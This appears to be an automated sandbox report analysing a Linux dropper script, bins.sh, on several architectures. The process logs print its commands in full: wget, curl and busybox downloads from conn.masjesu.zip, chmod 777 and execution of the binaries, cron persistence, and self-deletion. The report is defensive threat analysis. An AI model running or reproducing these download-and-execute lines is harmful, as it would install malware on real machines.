Malware Analysis Report

2025-05-28 16:16

Sample ID: 241205-jqdr3s1mgp
Target: bins.sh
SHA256: c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661
Tags: discovery antivm defense_evasion execution persistence privilege_escalation
Score: 7/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral3
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral4
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 7/10

SHA256: c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661

Threat Level: Shows suspicious behavior

The file bins.sh was found to show suspicious behavior.

Malicious Activity Summary

discovery antivm defense_evasion execution persistence privilege_escalation

Executes dropped EXE

Renames itself

File and Directory Permissions Modification

Creates/modifies Cron job

Enumerates running processes

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-12-05 07:52

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-12-05 07:52
Reported: 2024-12-05 07:54
Platform: ubuntu1804-amd64-20240611-en
Max time kernel: 149s
Max time network: 131s

Command Line

[/tmp/bins.sh]

Signatures

System Network Configuration Discovery (discovery)
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/bins.sh  [/tmp/bins.sh]
/bin/rm  [/bin/rm bins.sh]
/usr/bin/wget  [wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/usr/bin/curl  [curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.14:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-12-05 07:52
Reported: 2024-12-05 07:54
Platform: debian9-armhf-20240611-en
Max time kernel: 150s
Max time network: 153s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification (defense_evasion)
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A

Creates/modifies Cron job (execution persistence privilege_escalation)
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.nFADI4 /usr/bin/crontab N/A

Enumerates running processes

Checks CPU configuration (antivm)
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information (discovery)
Description Indicator Process Target
File opened for reading /proc/265/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/692/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/699/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/716/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/789/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/824/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/12/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/27/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/783/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/835/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/902/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/17/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/645/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/702/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/780/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/25/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/650/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/844/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/862/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/863/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/891/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/710/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/792/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/867/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/290/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/451/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/802/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/871/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/882/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/1/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/812/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/872/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/724/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/786/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/738/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/781/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/813/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/877/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/886/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/887/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/893/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/731/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/906/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/720/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/745/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/330/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/840/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/744/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/787/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/810/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/859/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/402/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/717/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/14/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/726/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/260/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/774/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/861/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/794/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/836/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/23/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A
File opened for reading /proc/740/cmdline /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A

System Network Configuration Discovery (discovery)
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB /usr/bin/curl N/A

Processes

/tmp/bins.sh  [/tmp/bins.sh]
/bin/rm  [/bin/rm bins.sh]
/usr/bin/wget  [wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/usr/bin/curl  [curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/bin/busybox  [/bin/busybox wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]
/bin/chmod  [chmod 777 zZM090BtLw96clc18K3325Bi3InWJUorwB]
/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB  [./zZM090BtLw96clc18K3325Bi3InWJUorwB]
/bin/sh  [sh -c crontab -l]
/usr/bin/crontab  [crontab -l]
/bin/sh  [sh -c crontab -]
/usr/bin/crontab  [crontab -]
/bin/rm  [rm zZM090BtLw96clc18K3325Bi3InWJUorwB]
/usr/bin/wget  [wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/usr/bin/curl  [curl -O http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/bin/busybox  [/bin/busybox wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/bin/chmod  [chmod 777 ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/tmp/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG  [./ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/bin/rm  [rm ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]
/usr/bin/wget  [wget http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/usr/bin/curl  [curl -O http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/bin/busybox  [/bin/busybox wget http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/bin/chmod  [chmod 777 OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/tmp/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9  [./OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/bin/rm  [rm OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9]
/usr/bin/wget  [wget http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/usr/bin/curl  [curl -O http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/bin/busybox  [/bin/busybox wget http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/bin/chmod  [chmod 777 Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/tmp/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX  [./Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/bin/rm  [rm Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX]
/usr/bin/wget  [wget http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/usr/bin/curl  [curl -O http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/bin/busybox  [/bin/busybox wget http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/bin/chmod  [chmod 777 Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/tmp/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS  [./Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/bin/rm  [rm Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS]
/usr/bin/wget  [wget http://conn.masjesu.zip/bins/jycs76M6vBIZ1GmDmLy0gXM9o11CS79Z9O]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:443 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:443 conn.masjesu.zip tcp
US 216.126.231.240:80 conn.masjesu.zip tcp
DK 2.105.79.16:49152 tcp
US 168.3.149.174:37215 tcp
NL 145.210.134.181:8443 tcp
US 48.73.202.179:37215 tcp
CN 119.6.213.144:37215 tcp
CN 157.156.177.163:37215 tcp
CZ 90.180.75.74:37215 tcp
CN 182.111.26.56:37215 tcp
US 166.45.87.196:37215 tcp
US 18.7.155.165:5555 tcp
IN 171.59.82.186:81 tcp
US 35.85.168.78:80 tcp
IT 80.17.7.142:80 tcp
US 161.6.151.73:80 tcp
JP 36.12.152.179:80 tcp
US 99.149.244.54:80 tcp
US 15.97.191.187:80 tcp
US 19.191.169.151:80 tcp
IT 5.98.119.62:80 tcp
CH 81.6.43.148:80 tcp
US 167.65.125.127:80 tcp
US 108.122.217.15:81 tcp
US 168.3.149.174:80 tcp

Files

/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB

MD5 786d75a158fe731feca3880f436082c0
SHA1 79ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA256 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA512 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

/var/spool/cron/crontabs/tmp.nFADI4

MD5 5e8eb0b39864e53b859bcdcaeb4dbe6a
SHA1 c8116483ad132a21e500bb5087c53996ed66334c
SHA256 6f0768d965338cb7d3061fcc41810df84bd23d8978a6e186fe996b33e6ae37e7
SHA512 4338d28aba1567ee8022a74e0d80020daaeea88b4d026c36fbb9e395e7e9d4a511073e94a018afe1863248585fe7f413d09ccff177f6b41c24ff829d746a0820

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-05 07:52

Reported

2024-12-05 07:54

Platform

debian9-mipsbe-20240611-en

Max time kernel

139s

Max time network

151s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB /usr/bin/wget N/A
File opened for modification /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

/bin/chmod

[chmod 777 zZM090BtLw96clc18K3325Bi3InWJUorwB]

/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB

[./zZM090BtLw96clc18K3325Bi3InWJUorwB]

/bin/rm

[rm zZM090BtLw96clc18K3325Bi3InWJUorwB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB

MD5 786d75a158fe731feca3880f436082c0
SHA1 79ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA256 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA512 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

Analysis: behavioral4

Detonation Overview

Submitted

2024-12-05 07:52

Reported

2024-12-05 07:54

Platform

debian9-mipsel-20240226-en

Max time kernel

149s

Max time network

9s

Command Line

[/tmp/bins.sh]

Signatures

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB

MD5 786d75a158fe731feca3880f436082c0
SHA1 79ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA256 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA512 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f